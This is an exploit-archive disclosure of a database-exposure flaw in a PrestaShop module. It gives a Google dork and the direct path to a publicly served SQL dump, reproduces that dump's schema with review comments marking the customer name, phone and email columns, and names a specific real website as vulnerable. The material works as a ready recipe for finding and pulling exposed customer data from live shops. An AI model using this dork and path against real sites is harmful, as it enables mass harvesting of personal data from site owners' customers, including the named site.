###########################################################################

# Exploit Title : PrestaShop yllyaidechantier Modules 1.4.9.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.9.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/yllyaidechantier/db/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] - CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# Note : the request shown under "Exploit" is a direct fetch of a static file with no traversal sequence, so CWE-200 / CWE-538 [ sensitive information in an externally accessible file ] describes it more closely than CWE-23.

###########################################################################

# Exploit :

/modules/yllyaidechantier/db/ydb.sql

###########################################################################

# Example SQL Database Dump Information Exposure =>

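-- phpMyAdmin SQL Dump
-- version 4.0.4
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generated on: Mon 07 April 2014 at 16:27
-- Server version: 5.5.20-log
-- PHP version: 5.3.10
--
-- NOTE(review): this header alone discloses the phpMyAdmin, MySQL server and
-- PHP versions of the host the dump was taken on. The file is served from the
-- module's db/ directory (/modules/yllyaidechantier/db/ydb.sql); it should be
-- moved out of the document root, or direct requests for *.sql files under
-- /modules/ should be denied at the web server.

-- Session settings phpMyAdmin writes so the dump replays the same way.
-- NO_AUTO_VALUE_ON_ZERO keeps an explicit 0 in an AUTO_INCREMENT column
-- instead of replacing it with the next sequence value.
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";

-- Version-gated comments: executed only by MySQL 4.1.1 and later.
-- They save the session's character-set and collation settings in user
-- variables, then switch the connection to utf8.
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
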
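--
-- Database: `velux`
--
-- Creates the schema only when it is missing, then makes it the default for
-- every statement that follows.
-- NOTE(review): the schema name is part of what the exposed file discloses.
CREATE DATABASE IF NOT EXISTS `velux`
    DEFAULT CHARACTER SET latin1
    COLLATE latin1_swedish_ci;
USE `velux`;
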
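-- --------------------------------------------------------

--
-- Table structure for table `ps_y_aidechantier_demande`
--
-- One row per request ("demande"). The columns lastname, firstname, phone,
-- email and fax hold personal contact data, so this layout tells a reader of
-- the exposed file exactly where customer PII lives.
-- NOTE(review): AUTO_INCREMENT=1 suggests the table was empty when dumped, and
-- no INSERT statements appear in this excerpt -- the excerpt shows structure
-- only.
-- NOTE(review): id_template, id_customer and id_scenario look like references
-- to other tables, but no FOREIGN KEY is declared for them here.
--
-- Destructive on replay: DROP TABLE removes any existing table and its rows
-- before the CREATE runs.
DROP TABLE IF EXISTS `ps_y_aidechantier_demande`;
CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_demande` (
  `id_demande` int(11) NOT NULL AUTO_INCREMENT,
  `id_template` int(11) NOT NULL,
  `id_customer` int(11) NOT NULL,
  `id_scenario` int(11) NOT NULL,
  -- personal contact data
  `lastname` varchar(500) NOT NULL,
  `firstname` varchar(500) NOT NULL,
  `phone` varchar(50) NOT NULL,
  `email` varchar(500) NOT NULL,
  `fax` varchar(50) NOT NULL,
  -- free-text job-site ("chantier") fields; their meaning is not shown in the dump
  `chantier_charpente` varchar(500) NOT NULL,
  `chantier_couverture` varchar(500) NOT NULL,
  `chantier_fenetre` varchar(500) NOT NULL,
  `chantier_raccord` varchar(500) NOT NULL,
  `chantier_isolation` varchar(500) NOT NULL,
  `chantier_domotique` varchar(500) NOT NULL,
  `date_add` date NOT NULL,
  PRIMARY KEY (`id_demande`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
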
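-- --------------------------------------------------------

--
-- Table structure for table `ps_y_aidechantier_scenario`
--
-- One row per scenario, each tied to a template by id_template (no FOREIGN KEY
-- is declared for it here).
-- NOTE(review): `price` is stored as DOUBLE, which is inexact for money; the
-- column is reproduced as dumped, a DECIMAL type would avoid rounding drift.
--
-- Destructive on replay: DROP TABLE removes any existing table and its rows
-- before the CREATE runs.
DROP TABLE IF EXISTS `ps_y_aidechantier_scenario`;
CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_scenario` (
  `id_scenario` int(11) NOT NULL AUTO_INCREMENT,
  `id_template` int(11) NOT NULL,
  `title` varchar(500) NOT NULL,
  `price` double NOT NULL,
  `date_add` date NOT NULL,
  PRIMARY KEY (`id_scenario`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;
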
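-- --------------------------------------------------------

--
-- Table structure for table `ps_y_aidechantier_template`
--
-- One row per template; the UNIQUE key allows at most one template per
-- id_product.
-- NOTE(review): the plain KEY `id_product` indexes the same single column as
-- the UNIQUE KEY `id_product_2`, so it is redundant; both are reproduced as
-- dumped.
--
-- Destructive on replay: DROP TABLE removes any existing table and its rows
-- before the CREATE runs.
DROP TABLE IF EXISTS `ps_y_aidechantier_template`;
CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_template` (
  `id_template` int(11) NOT NULL AUTO_INCREMENT,
  `id_product` int(11) NOT NULL,
  `name` varchar(500) NOT NULL,
  `date_add` date NOT NULL,
  PRIMARY KEY (`id_template`),
  UNIQUE KEY `id_product_2` (`id_product`),
  KEY `id_product` (`id_product`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=8 ;
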
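-- Version-gated comments (MySQL 4.1.1 and later): put back the character-set
-- and collation settings held in the @OLD_* user variables, so the session is
-- left as it was before the dump ran.
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;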


###########################################################################

# Example Vulnerable Site =>

[+] portailpro.fr/modules/yllyaidechantier/db/ydb.sql

###########################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################